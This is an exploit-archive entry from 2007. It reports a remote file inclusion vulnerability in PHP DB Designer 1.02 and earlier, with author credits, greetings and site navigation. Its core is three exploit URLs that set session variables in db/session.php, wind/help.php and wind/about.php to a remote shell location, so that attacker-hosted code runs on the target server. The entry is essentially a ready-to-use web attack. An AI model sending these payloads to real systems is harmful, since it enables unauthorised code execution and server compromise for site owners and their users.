PHP DB Designer <= 1.02 Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP DB Designer <= 1.02 Remote File Include Vulnerabilities
# Published : 2007-03-16
# Author : GoLd_M
# Previous Title : Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit
# Next Title : Orion-Blog 2.0 (AdminBlogNewsEdit.asp) Remote Auth Bypass Vuln

# PHP DB Designer <= 1.02 Remote File Include Exploit
# D.Script: http://sourceforge.net/projects/phpdbdesigner/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:[Path]/db/session.php?_SESSION[DRIVER]=Shell
# Exploit:[Path]/wind/help.php?_SESSION[SITE_PATH]=Shell
# Exploit:[Path]/wind/about.php?_SESSION[SITE_PATH]=Shell

# www.Syue.com [2007-03-16]